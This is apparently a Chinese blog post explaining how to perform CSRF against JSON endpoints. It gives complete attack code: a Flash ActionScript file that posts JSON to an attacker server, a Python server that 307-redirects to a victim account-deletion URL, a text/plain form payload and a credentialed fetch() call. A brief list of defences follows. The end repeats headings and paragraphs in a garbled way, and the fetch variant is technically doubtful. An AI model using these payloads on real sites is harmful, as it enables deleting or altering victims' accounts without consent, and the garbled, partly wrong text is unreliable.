利用JSON端点中的CSRF漏洞技术分析<\/h1>

背景介绍<\/h2>

在渗透测试过程中，安全研究人员发现了一种特殊的CSRF（跨站请求伪造）漏洞，该漏洞存在于接收JSON格式POST请求的端点中。传统的CSRF利用方法无法直接应用于这种端点，因为：<\/p>

需要发送JSON格式的POST body<\/li>
需要设置自定义Content-Type头为application\/json<\/code><\/li>

标准HTML表单无法满足这些要求<\/li>
<\/ol>
传统CSRF利用的限制<\/h2>
传统CSRF PoC通常使用HTML表单提交数据：<\/p>
<html<\/span>>
<\/span><\/span><body<\/span> onload<\/span>=<\/span>myform.submit()<\/span>>
<\/span><\/span><form<\/span> action<\/span>=<\/span>"\/userdelete"<\/span> method<\/span>=<\/span>"POST"<\/span> name<\/span>=<\/span>"myform"<\/span>>
<\/span><\/span>  <input<\/span> type<\/span>=<\/span>"hidden"<\/span> id<\/span>=<\/span>"acctnum"<\/span> name<\/span>=<\/span>"acctnum"<\/span> value<\/span>=<\/span>"100"<\/span>>
<\/span><\/span>  <input<\/span> type<\/span>=<\/span>"hidden"<\/span> id<\/span>=<\/span>"confirm"<\/span> name<\/span>=<\/span>"confirm"<\/span> value<\/span>=<\/span>"true"<\/span>>
<\/span><\/span><\/form<\/span>>
<\/span><\/span><\/body<\/span>>
<\/span><\/span><\/html<\/span>>
<\/span><\/span><\/code><\/pre>这种方法有以下限制：<\/p>

只能发送application\/x-www-form-urlencoded<\/code>格式<\/li>
无法设置自定义HTTP头<\/li>
无法直接发送JSON格式数据<\/li>
<\/ul>
解决方案：Flash + HTTP 307重定向<\/h2>
技术原理<\/h3>

Flash (ActionScript)<\/strong>：可以设置自定义HTTP头并发送POST请求<\/li>
HTTP 307<\/strong>：临时重定向状态码，能保持原始请求方法和请求体不变<\/li>
<\/ol>
攻击流程<\/h3>

目标用户访问包含恶意Flash的页面<\/li>
Flash向攻击者控制的服务器发送POST请求（含JSON数据和自定义头）<\/li>
攻击者服务器返回307重定向到目标站点<\/li>
浏览器自动重定向请求到目标站点，保持JSON数据和application\/json<\/code>头<\/li>
<\/ol>
具体实现步骤<\/h2>
1. 创建恶意Flash文件 (csrf.swf)<\/h3>
准备工作<\/strong>：<\/p>

安装Flex SDK（需要32位JVM）<\/li>
创建ActionScript文件csrf.as<\/code><\/li>
<\/ul>
ActionScript代码<\/strong>：<\/p>
package<\/span> {
<\/span><\/span>  import<\/span> flash<\/span>.display<\/span>.Sprite;<\/span>
<\/span><\/span>  import<\/span> flash<\/span>.net<\/span>.URLLoader;<\/span>
<\/span><\/span>  import<\/span> flash<\/span>.net<\/span>.URLRequest;<\/span>
<\/span><\/span>  import<\/span> flash<\/span>.net<\/span>.URLRequestHeader;<\/span>
<\/span><\/span>  import<\/span> flash<\/span>.net<\/span>.URLRequestMethod;<\/span>
<\/span><\/span>  
<\/span><\/span>  public<\/span> class<\/span> csrf<\/span> extends<\/span> Sprite {
<\/span><\/span>    public<\/span> function<\/span> csrf<\/span>() {
<\/span><\/span>      super<\/span>();
<\/span><\/span>      var<\/span> member1<\/span>:<\/span>Object =<\/span> null<\/span>;<\/span>
<\/span><\/span>      var<\/span> myJson<\/span>:<\/span>String =<\/span> null<\/span>;<\/span>
<\/span><\/span>      
<\/span><\/span>      member1<\/span> =<\/span> new<\/span> Object();
<\/span><\/span>      member1<\/span> =<\/span> { "acctnum"<\/span>:<\/span>"100"<\/span>,<\/span> "confirm"<\/span>:<\/span>"true"<\/span> };
<\/span><\/span>      var<\/span> myData<\/span>:<\/span>Object =<\/span> member1<\/span>;<\/span>
<\/span><\/span>      myJson<\/span> =<\/span> JSON<\/span>.stringify<\/span>(myData<\/span>);
<\/span><\/span>      
<\/span><\/span>      var<\/span> url<\/span>:<\/span>String =<\/span> "http:\/\/attacker-ip:8000\/"<\/span>;<\/span>
<\/span><\/span>      var<\/span> request<\/span>:<\/span>URLRequest =<\/span> new<\/span> URLRequest(url<\/span>);
<\/span><\/span>      request<\/span>.requestHeaders<\/span>.push<\/span>(new<\/span> URLRequestHeader("Content-Type"<\/span>,<\/span>"application\/json"<\/span>));
<\/span><\/span>      request<\/span>.data<\/span> =<\/span> myJson<\/span>;<\/span>
<\/span><\/span>      request<\/span>.method<\/span> =<\/span> URLRequestMethod.POST<\/span>;<\/span>
<\/span><\/span>      
<\/span><\/span>      var<\/span> urlLoader<\/span>:<\/span>URLLoader =<\/span> new<\/span> URLLoader();
<\/span><\/span>      try<\/span> {
<\/span><\/span>        urlLoader<\/span>.load<\/span>(request<\/span>);
<\/span><\/span>        return<\/span>;<\/span>
<\/span><\/span>      } catch<\/span>(e<\/span>:<\/span>Error) {
<\/span><\/span>        trace<\/span>(e<\/span>);
<\/span><\/span>        return<\/span>;<\/span>
<\/span><\/span>      }
<\/span><\/span>    }
<\/span><\/span>  }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>编译命令<\/strong>：<\/p>
mxmlc csrf.as
<\/code><\/pre>
2. 创建重定向服务器<\/h3>
使用Python创建简单的HTTP服务器：<\/p>
import<\/span> BaseHTTPServer
<\/span><\/span>import<\/span> time
<\/span><\/span>import<\/span> sys
<\/span><\/span>
<\/span><\/span>HOST =<\/span> ''<\/span>
<\/span><\/span>PORT =<\/span> 8000<\/span>
<\/span><\/span>
<\/span><\/span>class<\/span> RedirectHandler<\/span>(BaseHTTPServer.<\/span>BaseHTTPRequestHandler):
<\/span><\/span>    def<\/span> do_POST<\/span>(s):
<\/span><\/span>        if<\/span> s.<\/span>path ==<\/span> '\/csrf.swf'<\/span>:
<\/span><\/span>            s.<\/span>send_response(200<\/span>)
<\/span><\/span>            s.<\/span>send_header("Content-Type"<\/span>, "application\/x-shockwave-flash"<\/span>)
<\/span><\/span>            s.<\/span>end_headers()
<\/span><\/span>            s.<\/span>wfile.<\/span>write(open("csrf.swf"<\/span>, "rb"<\/span>).<\/span>read())
<\/span><\/span>            return<\/span>
<\/span><\/span>        
<\/span><\/span>        s.<\/span>send_response(307<\/span>)
<\/span><\/span>        s.<\/span>send_header("Location"<\/span>, "http:\/\/victim-site\/userdelete"<\/span>)
<\/span><\/span>        s.<\/span>end_headers()
<\/span><\/span>    
<\/span><\/span>    def<\/span> do_GET<\/span>(s):
<\/span><\/span>        print(s.<\/span>path)
<\/span><\/span>        s.<\/span>do_POST()
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> '__main__'<\/span>:
<\/span><\/span>    server_class =<\/span> BaseHTTPServer.<\/span>HTTPServer
<\/span><\/span>    httpd =<\/span> server_class((HOST, PORT), RedirectHandler)
<\/span><\/span>    print time.<\/span>asctime(), "Server Starts - <\/span>%s<\/span>:<\/span>%s<\/span>"<\/span> %<\/span> (HOST, PORT)
<\/span><\/span>    try<\/span>:
<\/span><\/span>        httpd.<\/span>serve_forever()
<\/span><\/span>    except<\/span> KeyboardInterrupt<\/span>:
<\/span><\/span>        pass<\/span>
<\/span><\/span>    httpd.<\/span>server_close()
<\/span><\/span>    print time.<\/span>asctime(), "Server Stops - <\/span>%s<\/span>:<\/span>%s<\/span>"<\/span> %<\/span> (HOST, PORT)
<\/span><\/span><\/code><\/pre>3. 攻击流程<\/h3>

目标用户登录目标网站http:\/\/victim-site\/<\/code><\/li>
用户访问攻击者控制的http:\/\/attacker-ip:8000\/csrf.swf<\/code><\/li>
Flash文件加载并发送POST请求到攻击者服务器<\/li>
服务器返回307重定向到http:\/\/victim-site\/userdelete<\/code><\/li>
浏览器自动重定向请求，保持JSON数据和application\/json<\/code>头<\/li>
目标用户的账户被删除<\/li>
<\/ol>
替代方案<\/h2>
如果服务器不严格检查Content-Type，可以使用以下方法：<\/p>
1. 使用HTML表单和text\/plain编码<\/h3>
<html<\/span>>
<\/span><\/span><body<\/span>>
<\/span><\/span><script<\/span> src<\/span>=<\/span>"https:\/\/ajax.googleapis.com\/ajax\/libs\/jquery\/3.3.1\/jquery.min.js"<\/span>><\/script<\/span>>
<\/span><\/span><form<\/span> id<\/span>=<\/span>"myform"<\/span> enctype<\/span>=<\/span>"text\/plain"<\/span> action<\/span>=<\/span>"https:\/\/victim-site\/userdelete"<\/span> method<\/span>=<\/span>"POST"<\/span>>
<\/span><\/span>  <input<\/span> id<\/span>=<\/span>"json"<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>'json'<\/span> value<\/span>=<\/span>'test"}'<\/span>>
<\/span><\/span><\/form<\/span>>
<\/span><\/span><script<\/span>>
<\/span><\/span>$<\/span>(document).ready<\/span>(function<\/span>() {
<\/span><\/span>  $<\/span>("#json"<\/span>).attr<\/span>("name"<\/span>, '{"acctnum":"100","confirm":"true","a"'<\/span>)
<\/span><\/span>  $<\/span>("#myform"<\/span>).submit<\/span>()
<\/span><\/span>});
<\/span><\/span><\/script<\/span>>
<\/span><\/span><\/body<\/span>>
<\/span><\/span><\/html<\/span>>
<\/span><\/span><\/code><\/pre>2. 使用Fetch API<\/h3>
fetch<\/span>('https:\/\/victim-site\/userdelete'<\/span>, {
<\/span><\/span>  method<\/span>:<\/span> 'POST'<\/span>,
<\/span><\/span>  headers<\/span>:<\/span> {
<\/span><\/span>    'Content-Type'<\/span>:<\/span> 'application\/json'<\/span>,
<\/span><\/span>  },
<\/span><\/span>  body<\/span>:<\/span> JSON<\/span>.stringify<\/span>({acctnum<\/span>:<\/span> "100"<\/span>, confirm<\/span>:<\/span> "true"<\/span>}),
<\/span><\/span>  credentials<\/span>:<\/span> 'include'<\/span>
<\/span><\/span>});
<\/span><\/span><\/code><\/pre>防御措施<\/h2>

使用CSRF令牌<\/strong>：在请求中包含高强度随机令牌<\/li>
SameSite Cookie属性<\/strong>：设置Cookie的SameSite属性为Strict或Lax<\/li>
验证Origin\/Referer头<\/strong>：检查请求来源<\/li>
避免GET请求修改状态<\/strong>：遵循RESTful设计原则<\/li>
修复XSS漏洞<\/strong>：XSS可能绕过CSRF保护<\/li>
<\/ol>
参考资源<\/h2>

OWASP CSRF防护指南<\/li>
GitHub项目：json-flash-csrf-poc<\/li>
Fetch API文档<\/li>
<\/ul>
通过这种技术组合，攻击者可以绕过JSON端点的CSRF保护，强调了全面安全防护的重要性。<\/p>

利用JSON端点中的CSRF漏洞技术分析<\/h1>

解决方案：Flash + HTTP 307重定向<\/h2>

具体实现步骤<\/h2>

替代方案<\/h2> 如果服务器不严格检查Content-Type，可以使用以下方法：<\/p>

参考资源<\/h2> OWASP CSRF防护指南<\/li> GitHub项目：json-flash-csrf-poc<\/li> Fetch API文档<\/li> <\/ul> 通过这种技术组合，攻击者可以绕过JSON端点的CSRF保护，强调了全面安全防护的重要性。<\/p>

替代方案<\/h2>
如果服务器不严格检查Content-Type，可以使用以下方法：<\/p>

参考资源<\/h2>

OWASP CSRF防护指南<\/li>
GitHub项目：json-flash-csrf-poc<\/li>
Fetch API文档<\/li> <\/ul>
通过这种技术组合，攻击者可以绕过JSON端点的CSRF保护，强调了全面安全防护的重要性。<\/p>